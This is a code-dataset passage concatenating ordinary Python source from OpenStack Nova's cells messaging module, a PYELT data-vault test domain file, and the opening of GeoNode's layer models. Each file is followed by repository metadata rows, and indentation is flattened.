to create a new message and process it with the exception of
'message_from_json' which should be used by CellsDrivers to convert
a JSONified message it has received back into the appropriate Message
class.
Private methods are used internally when we need to keep some
'global' state. For instance, eventlet queues used for responses are
held in this class. Also, when a Message is process()ed above and
it's determined we should take action locally,
_process_message_locally() will be called.
When needing to add a new method to call in a Cell2Cell message,
define the new method below and also add it to the appropriate
MessageMethods class where the real work will be done.
"""
def __init__(self, state_manager):
self.state_manager = state_manager
cells_scheduler_cls = importutils.import_class(
CONF.cells.scheduler)
self.scheduler = cells_scheduler_cls(self)
self.response_queues = {}
self.methods_by_type = {}
self.our_name = CONF.cells.name
for msg_type, cls in _CELL_MESSAGE_TYPE_TO_METHODS_CLS.iteritems():
self.methods_by_type[msg_type] = cls(self)
self.serializer = objects_base.NovaObjectSerializer()
def _process_message_locally(self, message):
"""Message processing will call this when its determined that
the message should be processed within this cell. Find the
method to call based on the message type, and call it. The
caller is responsible for catching exceptions and returning
results to cells, if needed.
"""
methods = self.methods_by_type[message.message_type]
fn = getattr(methods, message.method_name)
return fn(message, **message.method_kwargs)
def _put_response(self, response_uuid, response):
"""Put a response into a response queue. This is called when
a _ResponseMessage is processed in the cell that initiated a
'call' to another cell.
"""
resp_queue = self.response_queues.get(response_uuid)
if not resp_queue:
# Response queue is gone. We must have restarted or we
# received a response after our timeout period.
return
resp_queue.put(response)
def _setup_response_queue(self, message):
"""Set up an eventlet queue to use to wait for replies.
Replies come back from the target cell as a _ResponseMessage
being sent back to the source.
"""
resp_queue = queue.Queue()
self.response_queues[message.uuid] = resp_queue
return resp_queue
def _cleanup_response_queue(self, message):
"""Stop tracking the response queue either because we're
done receiving responses, or we've timed out.
"""
try:
del self.response_queues[message.uuid]
except KeyError:
# Ignore if queue is gone already somehow.
pass
def _create_response_message(self, ctxt, direction, target_cell,
response_uuid, response_kwargs, **kwargs):
"""Create a ResponseMessage. This is used internally within
the nova.cells.messaging module.
"""
return _ResponseMessage(self, ctxt, 'parse_responses',
response_kwargs, direction, target_cell,
response_uuid, **kwargs)
def _get_migrations_for_cell(self, ctxt, cell_name, filters):
method_kwargs = dict(filters=filters)
message = _TargetedMessage(self, ctxt, 'get_migrations',
method_kwargs, 'down', cell_name,
need_response=True)
response = message.process()
if response.failure and isinstance(response.value[1],
exception.CellRoutingInconsistency):
return []
return [response]
def message_from_json(self, json_message):
"""Turns a message in JSON format into an appropriate Message
instance. This is called when cells receive a message from
another cell.
"""
message_dict = jsonutils.loads(json_message)
# Need to convert context back.
ctxt = message_dict['ctxt']
message_dict['ctxt'] = context.RequestContext.from_dict(ctxt)
# NOTE(comstud): We also need to re-serialize any objects that
# exist in 'method_kwargs'.
method_kwargs = message_dict['method_kwargs']
for k, v in method_kwargs.items():
method_kwargs[k] = self.serializer.deserialize_entity(
message_dict['ctxt'], v)
message_type = message_dict.pop('message_type')
message_cls = _CELL_MESSAGE_TYPE_TO_MESSAGE_CLS[message_type]
return message_cls(self, **message_dict)
def ask_children_for_capabilities(self, ctxt):
"""Tell child cells to send us capabilities. This is typically
called on startup of the nova-cells service.
"""
child_cells = self.state_manager.get_child_cells()
for child_cell in child_cells:
message = _TargetedMessage(self, ctxt,
'announce_capabilities',
dict(), 'down', child_cell)
message.process()
def ask_children_for_capacities(self, ctxt):
"""Tell child cells to send us capacities. This is typically
called on startup of the nova-cells service.
"""
child_cells = self.state_manager.get_child_cells()
for child_cell in child_cells:
message = _TargetedMessage(self, ctxt, 'announce_capacities',
dict(), 'down', child_cell)
message.process()
def tell_parents_our_capabilities(self, ctxt):
"""Send our capabilities to parent cells."""
parent_cells = self.state_manager.get_parent_cells()
if not parent_cells:
return
my_cell_info = self.state_manager.get_my_state()
capabs = self.state_manager.get_our_capabilities()
LOG.debug("Updating parents with our capabilities: %(capabs)s",
{'capabs': capabs})
# We have to turn the sets into lists so they can potentially
# be json encoded when the raw message is sent.
for key, values in capabs.items():
capabs[key] = list(values)
method_kwargs = {'cell_name': my_cell_info.name,
'capabilities': capabs}
for cell in parent_cells:
message = _TargetedMessage(self, ctxt, 'update_capabilities',
method_kwargs, 'up', cell, fanout=True)
message.process()
def tell_parents_our_capacities(self, ctxt):
"""Send our capacities to parent cells."""
parent_cells = self.state_manager.get_parent_cells()
if not parent_cells:
return
my_cell_info = self.state_manager.get_my_state()
capacities = self.state_manager.get_our_capacities()
LOG.debug("Updating parents with our capacities: %(capacities)s",
{'capacities': capacities})
method_kwargs = {'cell_name': my_cell_info.name,
'capacities': capacities}
for cell in parent_cells:
message = _TargetedMessage(self, ctxt, 'update_capacities',
method_kwargs, 'up', cell, fanout=True)
message.process()
def build_instances(self, ctxt, target_cell, build_inst_kwargs):
"""Called by the cell scheduler to tell a child cell to build
instance(s).
"""
method_kwargs = dict(build_inst_kwargs=build_inst_kwargs)
message = _TargetedMessage(self, ctxt, 'build_instances',
method_kwargs, 'down', target_cell)
message.process()
def run_compute_api_method(self, ctxt, cell_name, method_info, call):
"""Call a compute API method in a specific cell."""
message = _TargetedMessage(self, ctxt, 'run_compute_api_method',
dict(method_info=method_info), 'down',
cell_name, need_response=call)
return message.process()
def instance_update_at_top(self, ctxt, instance):
"""Update an instance at the top level cell."""
message = _BroadcastMessage(self, ctxt, 'instance_update_at_top',
dict(instance=instance), 'up',
run_locally=False)
message.process()
def instance_destroy_at_top(self, ctxt, instance):
"""Destroy an instance at the top level cell."""
message = _BroadcastMessage(self, ctxt, 'instance_destroy_at_top',
dict(instance=instance), 'up',
run_locally=False)
message.process()
def instance_delete_everywhere(self, ctxt, instance, delete_type):
"""This is used by API cell when it didn't know what cell
an instance was in, but the instance was requested to be
deleted or soft_deleted. So, we'll broadcast this everywhere.
"""
method_kwargs = dict(instance=instance, delete_type=delete_type)
message = _BroadcastMessage(self, ctxt,
'instance_delete_everywhere',
method_kwargs, 'down',
run_locally=False)
message.process()
def instance_fault_create_at_top(self, ctxt, instance_fault):
"""Create an instance fault at the top level cell."""
message = _BroadcastMessage(self, ctxt,
'instance_fault_create_at_top',
dict(instance_fault=instance_fault),
'up', run_locally=False)
message.process()
def bw_usage_update_at_top(self, ctxt, bw_update_info):
"""Update bandwidth usage at top level cell."""
message = _BroadcastMessage(self, ctxt, 'bw_usage_update_at_top',
dict(bw_update_info=bw_update_info),
'up', run_locally=False)
message.process()
def sync_instances(self, ctxt, project_id, updated_since, deleted):
"""Force a sync of all instances, potentially by project_id,
and potentially since a certain date/time.
"""
method_kwargs = dict(project_id=project_id,
updated_since=updated_since,
deleted=deleted)
message = _BroadcastMessage(self, ctxt, 'sync_instances',
method_kwargs, 'down',
run_locally=False)
message.process()
def service_get_all(self, ctxt, filters=None):
method_kwargs = dict(filters=filters)
message = _BroadcastMessage(self, ctxt, 'service_get_all',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def service_get_by_compute_host(self, ctxt, cell_name, host_name):
method_kwargs = dict(host_name=host_name)
message = _TargetedMessage(self, ctxt,
'service_get_by_compute_host',
method_kwargs, 'down', cell_name,
need_response=True)
return message.process()
def get_host_uptime(self, ctxt, cell_name, host_name):
method_kwargs = dict(host_name=host_name)
message = _TargetedMessage(self, ctxt,
'get_host_uptime',
method_kwargs, 'down', cell_name,
need_response=True)
return message.process()
def service_update(self, ctxt, cell_name, host_name, binary,
params_to_update):
"""Used to enable/disable a service. For compute services, setting to
disabled stops new builds arriving on that host.
:param host_name: the name of the host machine that the service is
running
:param binary: The name of the executable that the service runs as
:param params_to_update: eg. {'disabled': True}
:returns: the update service object
"""
method_kwargs = dict(host_name=host_name, binary=binary,
params_to_update=params_to_update)
message = _TargetedMessage(self, ctxt,
'service_update',
method_kwargs, 'down', cell_name,
need_response=True)
return message.process()
def service_delete(self, ctxt, cell_name, service_id):
"""Deletes the specified service."""
method_kwargs = {'service_id': service_id}
message = _TargetedMessage(self, ctxt,
'service_delete',
method_kwargs, 'down', cell_name,
need_response=True)
message.process()
def proxy_rpc_to_manager(self, ctxt, cell_name, host_name, topic,
rpc_message, call, timeout):
method_kwargs = {'host_name': host_name,
'topic': topic,
'rpc_message': rpc_message,
'timeout': timeout}
message = _TargetedMessage(self, ctxt,
'proxy_rpc_to_manager',
method_kwargs, 'down', cell_name,
need_response=call)
return message.process()
def task_log_get_all(self, ctxt, cell_name, task_name,
period_beginning, period_ending,
host=None, state=None):
"""Get task logs from the DB from all cells or a particular
cell.
If 'cell_name' is None or '', get responses from all cells.
If 'host' is not None, filter by host.
If 'state' is not None, filter by state.
Return a list of Response objects.
"""
method_kwargs = dict(task_name=task_name,
period_beginning=period_beginning,
period_ending=period_ending,
host=host, state=state)
if cell_name:
message = _TargetedMessage(self, ctxt, 'task_log_get_all',
method_kwargs, 'down',
cell_name, need_response=True)
# Caller should get a list of Responses.
return [message.process()]
message = _BroadcastMessage(self, ctxt, 'task_log_get_all',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def compute_node_get_all(self, ctxt, hypervisor_match=None):
"""Return list of compute nodes in all child cells."""
method_kwargs = dict(hypervisor_match=hypervisor_match)
message = _BroadcastMessage(self, ctxt, 'compute_node_get_all',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def compute_node_stats(self, ctxt):
"""Return compute node stats from all child cells."""
method_kwargs = dict()
message = _BroadcastMessage(self, ctxt, 'compute_node_stats',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def compute_node_get(self, ctxt, cell_name, compute_id):
"""Return compute node entry from a specific cell by ID."""
method_kwargs = dict(compute_id=compute_id)
message = _TargetedMessage(self, ctxt, 'compute_node_get',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def actions_get(self, ctxt, cell_name, instance_uuid):
method_kwargs = dict(instance_uuid=instance_uuid)
message = _TargetedMessage(self, ctxt, 'actions_get',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def action_get_by_request_id(self, ctxt, cell_name, instance_uuid,
request_id):
method_kwargs = dict(instance_uuid=instance_uuid,
request_id=request_id)
message = _TargetedMessage(self, ctxt, 'action_get_by_request_id',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def action_events_get(self, ctxt, cell_name, action_id):
method_kwargs = dict(action_id=action_id)
message = _TargetedMessage(self, ctxt, 'action_events_get',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def consoleauth_delete_tokens(self, ctxt, instance_uuid):
"""Delete consoleauth tokens for an instance in API cells."""
message = _BroadcastMessage(self, ctxt, 'consoleauth_delete_tokens',
dict(instance_uuid=instance_uuid),
'up', run_locally=False)
message.process()
def validate_console_port(self, ctxt, cell_name, instance_uuid,
console_port, console_type):
"""Validate console port with child cell compute node."""
method_kwargs = {'instance_uuid': instance_uuid,
'console_port': console_port,
'console_type': console_type}
message = _TargetedMessage(self, ctxt, 'validate_console_port',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def bdm_update_or_create_at_top(self, ctxt, bdm, create=None):
"""Update/Create a BDM at top level cell."""
message = _BroadcastMessage(self, ctxt,
'bdm_update_or_create_at_top',
dict(bdm=bdm, create=create),
'up', run_locally=False)
message.process()
def bdm_destroy_at_top(self, ctxt, instance_uuid, device_name=None,
volume_id=None):
"""Destroy a BDM at top level cell."""
method_kwargs = dict(instance_uuid=instance_uuid,
device_name=device_name,
volume_id=volume_id)
message = _BroadcastMessage(self, ctxt, 'bdm_destroy_at_top',
method_kwargs,
'up', run_locally=False)
message.process()
def get_migrations(self, ctxt, cell_name, run_locally, filters):
"""Fetch all migrations applying the filters for a given cell or all
cells.
"""
method_kwargs = dict(filters=filters)
if cell_name:
return self._get_migrations_for_cell(ctxt, cell_name, filters)
message = _BroadcastMessage(self, ctxt, 'get_migrations',
method_kwargs, 'down',
run_locally=run_locally,
need_response=True)
return message.process()
def _instance_action(self, ctxt, instance, method, extra_kwargs=None,
need_response=False):
"""Call instance_<method> in correct cell for instance."""
cell_name = instance.cell_name
if not cell_name:
LOG.warn(_("No cell_name for %(method)s() from API"),
dict(method=method), instance=instance)
return
method_kwargs = {'instance': instance}
if extra_kwargs:
method_kwargs.update(extra_kwargs)
message = _TargetedMessage(self, ctxt, method, method_kwargs,
'down', cell_name,
need_response=need_response)
return message.process()
def instance_update_from_api(self, ctxt, instance,
expected_vm_state, expected_task_state,
admin_state_reset):
"""Update an instance object in its cell."""
cell_name = instance.cell_name
if not cell_name:
LOG.warn(_("No cell_name for instance update from API"),
instance=instance)
return
method_kwargs = {'instance': instance,
'expected_vm_state': expected_vm_state,
'expected_task_state': expected_task_state,
'admin_state_reset': admin_state_reset}
message = _TargetedMessage(self, ctxt, 'instance_update_from_api',
method_kwargs, 'down',
cell_name)
message.process()
def start_instance(self, ctxt, instance):
"""Start an instance in its cell."""
self._instance_action(ctxt, instance, 'start_instance')
def stop_instance(self, ctxt, instance, do_cast=True):
"""Stop an instance in its cell."""
if do_cast:
self._instance_action(ctxt, instance, 'stop_instance')
else:
return self._instance_action(ctxt, instance, 'stop_instance',
need_response=True)
def reboot_instance(self, ctxt, instance, reboot_type):
"""Reboot an instance in its cell."""
extra_kwargs = dict(reboot_type=reboot_type)
self._instance_action(ctxt, instance, 'reboot_instance',
extra_kwargs=extra_kwargs)
def suspend_instance(self, ctxt, instance):
"""Suspend an instance in its cell."""
self._instance_action(ctxt, instance, 'suspend_instance')
def resume_instance(self, ctxt, instance):
"""Resume an instance in its cell."""
self._instance_action(ctxt, instance, 'resume_instance')
def terminate_instance(self, ctxt, instance):
self._instance_action(ctxt, instance, 'terminate_instance')
def soft_delete_instance(self, ctxt, instance):
self._instance_action(ctxt, instance, 'soft_delete_instance')
def pause_instance(self, ctxt, instance):
"""Pause an instance in its cell."""
self._instance_action(ctxt, instance, 'pause_instance')
def unpause_instance(self, ctxt, instance):
"""Unpause an instance in its cell."""
self._instance_action(ctxt, instance, 'unpause_instance')
def resize_instance(self, ctxt, instance, flavor,
extra_instance_updates):
"""Resize an instance in its cell."""
extra_kwargs = dict(flavor=flavor,
extra_instance_updates=extra_instance_updates)
self._instance_action(ctxt, instance, 'resize_instance',
extra_kwargs=extra_kwargs)
def live_migrate_instance(self, ctxt, instance, block_migration,
disk_over_commit, host_name):
"""Live migrate an instance in its cell."""
extra_kwargs = dict(block_migration=block_migration,
disk_over_commit=disk_over_commit,
host_name=host_name)
self._instance_action(ctxt, instance, 'live_migrate_instance',
extra_kwargs=extra_kwargs)
def revert_resize(self, ctxt, instance):
"""Revert a resize for an instance in its cell."""
self._instance_action(ctxt, instance, 'revert_resize')
def confirm_resize(self, ctxt, instance):
"""Confirm a resize for an instance in its cell."""
self._instance_action(ctxt, instance, 'confirm_resize')
def reset_network(self, ctxt, instance):
"""Reset networking for an instance in its cell."""
self._instance_action(ctxt, instance, 'reset_network')
def inject_network_info(self, ctxt, instance):
"""Inject networking for an instance in its cell."""
self._instance_action(ctxt, instance, 'inject_network_info')
def snapshot_instance(self, ctxt, instance, image_id):
"""Snapshot an instance in its cell."""
extra_kwargs = dict(image_id=image_id)
self._instance_action(ctxt, instance, 'snapshot_instance',
extra_kwargs=extra_kwargs)
def backup_instance(self, ctxt, instance, image_id, backup_type,
rotation):
"""Backup an instance in its cell."""
extra_kwargs = dict(image_id=image_id, backup_type=backup_type,
rotation=rotation)
self._instance_action(ctxt, instance, 'backup_instance',
extra_kwargs=extra_kwargs)
def rebuild_instance(self, ctxt, instance, image_href, admin_password,
files_to_inject, preserve_ephemeral, kwargs):
extra_kwargs = dict(image_href=image_href,
admin_password=admin_password,
files_to_inject=files_to_inject,
preserve_ephemeral=preserve_ephemeral,
kwargs=kwargs)
self._instance_action(ctxt, instance, 'rebuild_instance',
extra_kwargs=extra_kwargs)
@staticmethod
def get_message_types():
return _CELL_MESSAGE_TYPE_TO_MESSAGE_CLS.keys()
class Response(object):
"""Holds a response from a cell. If there was a failure, 'failure'
will be True and 'response' will contain an encoded Exception.
"""
def __init__(self, cell_name, value, failure):
self.failure = failure
self.cell_name = cell_name
self.value = value
def to_json(self):
resp_value = self.value
if self.failure:
resp_value = serialize_remote_exception(resp_value,
log_failure=False)
_dict = {'cell_name': self.cell_name,
'value': resp_value,
'failure': self.failure}
return jsonutils.dumps(_dict)
@classmethod
def from_json(cls, json_message):
_dict = jsonutils.loads(json_message)
if _dict['failure']:
resp_value = deserialize_remote_exception(_dict['value'],
rpc.get_allowed_exmods())
_dict['value'] = resp_value
return cls(**_dict)
def value_or_raise(self):
if self.failure:
if isinstance(self.value, (tuple, list)):
raise self.value[0], self.value[1], self.value[2]
else:
raise self.value
return self.value
_REMOTE_POSTFIX = '_Remote'
def serialize_remote_exception(failure_info, log_failure=True):
"""Prepares exception data to be sent over rpc.
Failure_info should be a sys.exc_info() tuple.
"""
tb = traceback.format_exception(*failure_info)
failure = failure_info[1]
if log_failure:
LOG.error(_("Returning exception %s to caller"),
six.text_type(failure))
LOG.error(tb)
kwargs = {}
if hasattr(failure, 'kwargs'):
kwargs = failure.kwargs
# NOTE(matiu): With cells, it's possible to re-raise remote, remote
# exceptions. Lets turn it back into the original exception type.
cls_name = str(failure.__class__.__name__)
mod_name = str(failure.__class__.__module__)
if (cls_name.endswith(_REMOTE_POSTFIX) and
mod_name.endswith(_REMOTE_POSTFIX)):
cls_name = cls_name[:-len(_REMOTE_POSTFIX)]
mod_name = mod_name[:-len(_REMOTE_POSTFIX)]
data = {
'class': cls_name,
'module': mod_name,
'message': six.text_type(failure),
'tb': tb,
'args': failure.args,
'kwargs': kwargs
}
json_data = jsonutils.dumps(data)
return json_data
def deserialize_remote_exception(data, allowed_remote_exmods):
failure = jsonutils.loads(str(data))
trace = failure.get('tb', [])
message = failure.get('message', "") + "\n" + "\n".join(trace)
name = failure.get('class')
module = failure.get('module')
# NOTE(ameade): We DO NOT want to allow just any module to be imported, in
# order to prevent arbitrary code execution.
if module != 'exceptions' and module not in allowed_remote_exmods:
return messaging.RemoteError(name, failure.get('message'), trace)
try:
mod = importutils.import_module(module)
klass = getattr(mod, name)
if not issubclass(klass, Exception):
raise TypeError("Can only deserialize Exceptions")
failure = klass(*failure.get('args', []), **failure.get('kwargs', {}))
except (AttributeError, TypeError, ImportError):
return messaging.RemoteError(name, failure.get('message'), trace)
ex_type = type(failure)
str_override = lambda self: message
new_ex_type = type(ex_type.__name__ + _REMOTE_POSTFIX, (ex_type,),
{'__str__': str_override, '__unicode__': str_override})
new_ex_type.__module__ = '%s%s' % (module, _REMOTE_POSTFIX)
try:
# NOTE(ameade): Dynamically create a new exception type and swap it in
# as the new type for the exception. This only works on user defined
# Exceptions and not core python exceptions. This is important because
# we cannot necessarily change an exception message so we must override
# the __str__ method.
failure.__class__ = new_ex_type
except TypeError:
# NOTE(ameade): If a core exception then just add the traceback to the
# first exception argument.
failure.args = (message,) + failure.args[1:]
return failure
|
afrolov1/nova
|
nova/cells/messaging.py
|
Python
|
apache-2.0
| 84,342 | 0.000628 |
from pyelt.datalayers.database import Column, Columns
from pyelt.datalayers.dv import Sat, DvEntity, Link, Hub, HybridSat, LinkReference
class Role:
pass
class Act:
pass
class Participation:
pass
class Zorgverlener(DvEntity, Role):
class Default(Sat):
zorgverlenernummer = Columns.TextColumn()
aanvangsdatum = Columns.DateColumn()
einddatum = Columns.DateColumn()
class Personalia(Sat):
achternaam = Columns.TextColumn()
tussenvoegsels = Columns.TextColumn()
voorletters = Columns.TextColumn()
voornaam = Columns.TextColumn()
bijnaam = Columns.TextColumn()
# wordt niet gebruikt in dwh2.0; hier gebruikt voor testen uitgevoerd in test03r_domain.py
class ContactGegevens(HybridSat):
class Types(HybridSat.Types):
telefoon = 'telefoon'
mobiel = 'mobiel'
mobiel2 = 'mobiel2'
telnummer = Columns.TextColumn()
datum = Columns.DateColumn()
landcode = Columns.TextColumn()
default = Default()
personalia = Personalia()
contactgegevens = ContactGegevens()
class Adres(DvEntity, Role):
class Default(Sat):
postcode = Columns.TextColumn()
huisnummer = Columns.IntColumn()
huisnummer_toevoeging = Columns.TextColumn()
straat = Columns.TextColumn()
plaats = Columns.TextColumn()
land = Columns.TextColumn()
default = Default()
class Zorginstelling(DvEntity, Role):
class Default(Sat):
zorginstellings_naam = Columns.TextColumn()
zorginstellings_nummer = Columns.TextColumn()
default = Default()
#Dit is een link:
class Zorgverlener_Zorginstelling_Link(Link, Participation):
zorgverlener = LinkReference(Zorgverlener)
zorginstelling = LinkReference(Zorginstelling)
# Dit is een HybridLink:
class Zorgverlener_Adres_Link(Link):
class Types:
post = 'post'
bezoek = 'bezoek'
woon = 'woon'
zorgverlener = LinkReference(Zorgverlener)
adres = LinkReference(Adres)
class Zorginstelling_Adres_Link(Link):
zorginstelling = LinkReference(Zorginstelling)
adres = LinkReference(Adres)
|
NLHEALTHCARE/PYELT
|
tests/old/unit_tests_rob/_domain_rob_unittest.py
|
Python
|
gpl-3.0
| 2,194 | 0.001823 |
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import uuid
import logging
from datetime import datetime
from django.db import models
from django.db.models import signals
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from geonode.base.models import ResourceBase, ResourceBaseManager, resourcebase_post_save
from geonode.people.utils import get_valid_user
from agon_ratings.models import OverallRating
logger = logging.getLogger("geonode.layers.models")
shp_exts = ['.shp', ]
csv_exts = ['.csv']
kml_exts = ['.kml']
vec_exts = shp_exts + csv_exts + kml_exts
cov_exts = ['.tif', '.tiff', '.geotiff', '.geotif']
class Style(models.Model):
"""Model for storing styles.
"""
name = models.CharField(_('style name'), max_length=255, unique=True)
sld_title = models.CharField(max_length=255, null=True, blank=True)
sld_body = models.TextField(_('sld text'), null=True, blank=True)
sld_version = models.CharField(
_('sld version'),
max_length=12,
null=True,
blank=True)
sld_url = models.CharField(_('sld url'), null=True, max_length=1000)
workspace = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return "%s" % self.name.encode('utf-8')
class LayerManager(ResourceBaseManager):
def __init__(self):
models.Manager.__init__(self)
class Layer(ResourceBase):
"""
Layer (inherits ResourceBase fields)
"""
# internal fields
objects = LayerManager()
workspace = models.CharField(max_length=128)
store = models.CharField(max_length=128)
storeType = models.CharField(max_length=128)
name = models.CharField(max_length=128)
typename = models.CharField(max_length=128, null=True, blank=True)
default_style = models.ForeignKey(
Style,
related_name='layer_default_style',
null=True,
blank=True)
styles = models.ManyToManyField(Style, related_name='layer_styles')
charset = models.CharField(max_length=255, default='UTF-8')
upload_session = models.ForeignKey('UploadSession', blank=True, null=True)
service = models.ForeignKey(
'services.Service',
null=True,
blank=True,
related_name='layer_set')
def is_vector(self):
return self.storeType == 'dataStore'
@property
def display_type(self):
return ({
"dataStore": "Vector Data",
"coverageStore": "Raster Data",
}).get(self.storeType, "Data")
@property
def data_model(self):
if hasattr(self, 'modeldescription_set'):
lmd = self.modeldescription_set.all()
if lmd.exists():
return lmd.get().get_django_model()
return None
@property
def data_objects(self):
if self.data_model is not None:
return self.data_model.objects.using('datastore')
return None
@property
def service_type(self):
if self.storeType == 'coverageStore':
return "WCS"
if self.storeType == 'dataStore':
return "WFS"
@property
def ows_url(self):
if self.storeType == "remoteStore":
return self.service.base_url
else:
return settings.OGC_SERVER['default']['PUBLIC_LOCATION'] + "wms"
@property
def ptype(self):
if self.storeType == "remoteStore":
return self.service.ptype
else:
return "gxp_wmscsource"
@property
def service_typename(self):
if self.storeType == "remoteStore":
return "%s:%s" % (self.service.name, self.typename)
else:
return self.typename
def get_base_file(self):
"""Get the shp or geotiff file for this layer.
"""
# If there was no upload_session return None
if self.upload_session is None:
return None
base_exts = [x.replace('.', '') for x in cov_exts + vec_exts]
base_files = self.upload_session.layerfile_set.filter(
name__in=base_exts)
base_files_count = base_files.count()
# If there are no files in the upload_session return None
if base_files_count == 0:
return None
msg = 'There should only be one main file (.shp or .geotiff), found %s' % base_files_count
assert base_files_count == 1, msg
return base_files.get()
def get_absolute_url(self):
return reverse('layer_detail', args=(self.service_typename,))
def attribute_config(self):
# Get custom attribute sort order and labels if any
cfg = {}
visible_attributes = self.attribute_set.visible()
if (visible_attributes.count() > 0):
cfg["getFeatureInfo"] = {
"fields": [l.attribute for l in visible_attributes],
"propertyNames": dict([(l.attribute, l.attribute_label) for l in visible_attributes])
}
return cfg
def __str__(self):
if self.typename is not None:
return "%s Layer" % self.service_typename.encode('utf-8')
elif self.name is not None:
return "%s Layer" % self.name
else:
return "Unamed Layer"
class Meta:
# custom permissions,
# change and delete are standard in django
permissions = (
('view_layer','Can view'),
('change_layer_permissions',"Can change permissions"),
('edit_layer_style','can edit style'),
('edit_layer_metadata','can edit metadata'),
('edit_layer_data','can edit data'),
('download_layer','can download'),
('download_layer_metadata','can download metadata'))
# Permission Level Constants
# LEVEL_NONE inherited
LEVEL_READ = 'layer_readonly'
LEVEL_WRITE = 'layer_readwrite'
LEVEL_ADMIN = 'layer_admin'
def maps(self):
from geonode.maps.models import MapLayer
return MapLayer.objects.filter(name=self.typename)
@property
def class_name(self):
return self.__class__.__name__
class Layer_Styles(models.Model):
layer = models.ForeignKey(Layer)
style = models.ForeignKey(Style)
class UploadSession(models.Model):
"""Helper class to keep track of uploads.
"""
date = models.DateTimeField(auto_now=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
processed = models.BooleanField(default=False)
error = models.TextField(blank=True, null=True)
traceback = models.TextField(blank=True, null=True)
def successful(self):
return self.processed and self.errors is None
class LayerFile(models.Model):
"""Helper class to store original files.
"""
upload_session = models.ForeignKey(UploadSession)
name = models.CharField(max_length=255)
base = models.BooleanField(default=False)
file = models.FileField(upload_to='layers', max_length=255)
class AttributeManager(models.Manager):
"""Helper class to access filtered attributes
"""
def visible(self):
return self.get_query_set().filter(
visible=True).order_by('display_order')
class Attribute(models.Model):
"""
Auxiliary model for storing layer attributes.
This helps reduce the need for runtime lookups
to other servers, and lets users customize attribute titles,
sort order, and visibility.
"""
layer = models.ForeignKey(
Layer,
blank=False,
null=False,
unique=False,
related_name='attribute_set')
attribute = models.CharField(
_('attribute name'),
help_text=_('name of attribute as stored in shapefile/spatial database'),
max_length=255,
blank=False,
null=True,
unique=False)
description = models.CharField(
_('attribute description'),
help_text=_('description of attribute to be used in metadata'),
max_length=255,
blank=True,
null=True)
attribute_label = models.CharField(
_('attribute label'),
help_text=_('title of attribute as displayed in GeoNode'),
max_length=255,
blank=False,
null=True,
unique=False)
attribute_type = models.CharField(
_('attribute type'),
help_text=_('the data type of the attribute (integer, string, geometry, etc)'),
max_length=50,
blank=False,
null=False,
default='xsd:string',
unique=False)
visible = models.BooleanField(
_('visible?'),
help_text=_('specifies if the attribute should be displayed in identify results'),
default=True)
display_order = models.IntegerField(
_('display order'),
help_text=_('specifies the order in which attribute should be displayed in identify results'),
default=1)
# statistical derivations
count = models.IntegerField(
_('count'),
help_text=_('count value for this field'),
default=1)
min = models.CharField(
_('min'),
help_text=_('minimum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
max = models.CharField(
_('max'),
help_text=_('maximum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
average = models.CharField(
_('average'),
help_text=_('average value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
median = models.CharField(
_('median'),
help_text=_('median value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
stddev = models.CharField(
_('standard deviation'),
help_text=_('standard deviation for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
sum = models.CharField(
_('sum'),
help_text=_('sum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
unique_values = models.TextField(
_('unique values for this field'),
null=True,
blank=True,
default='NA')
last_stats_updated = models.DateTimeField(
_('last modified'),
default=datetime.now,
help_text=_('date when attribute statistics were last updated')) # passing the method itself, not
objects = AttributeManager()
def __str__(self):
return "%s" % self.attribute_label.encode(
"utf-8") if self.attribute_label else self.attribute.encode("utf-8")
def unique_values_as_list(self):
return self.unique_values.split(',')
def pre_save_layer(instance, sender, **kwargs):
if kwargs.get('raw', False):
instance.owner = instance.resourcebase_ptr.owner
instance.uuid = instance.resourcebase_ptr.uuid
instance.bbox_x0 = instance.resourcebase_ptr.bbox_x0
instance.bbox_x1 = instance.resourcebase_ptr.bbox_x1
instance.bbox_y0 = instance.resourcebase_ptr.bbox_y0
instance.bbox_y1 = instance.resourcebase_ptr.bbox_y1
if instance.abstract == '' or instance.abstract is None:
instance.abstract = 'No abstract provided'
if instance.title == '' or instance.title is None:
instance.title = instance.name
# Set a default user for accountstream to work correctly.
if instance.owner is None:
instance.owner = get_valid_user()
if instance.uuid == '':
instance.uuid = str(uuid.uuid1())
if instance.typename is None:
# Set a sensible default for the typename
instance.typename = 'geonode:%s' % instance.name
base_file = instance.get_base_file()
if base_file is not None:
extension = '.%s' % base_file.name
if extension in vec_exts:
instance.storeType = 'dataStore'
elif extension in cov_exts:
instance.storeType = 'coverageStore'
# Set sane defaults for None in bbox fields.
if instance.bbox_x0 is None:
instance.bbox_x0 = -180
if instance.bbox_x1 is None:
instance.bbox_x1 = 180
if instance.bbox_y0 is None:
instance.bbox_y0 = -90
if instance.bbox_y1 is None:
instance.bbox_y1 = 90
bbox = [
instance.bbox_x0,
instance.bbox_x1,
instance.bbox_y0,
